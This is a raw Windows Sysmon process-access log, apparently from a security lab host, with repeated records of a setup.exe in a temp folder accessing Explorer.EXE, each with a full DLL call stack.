13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC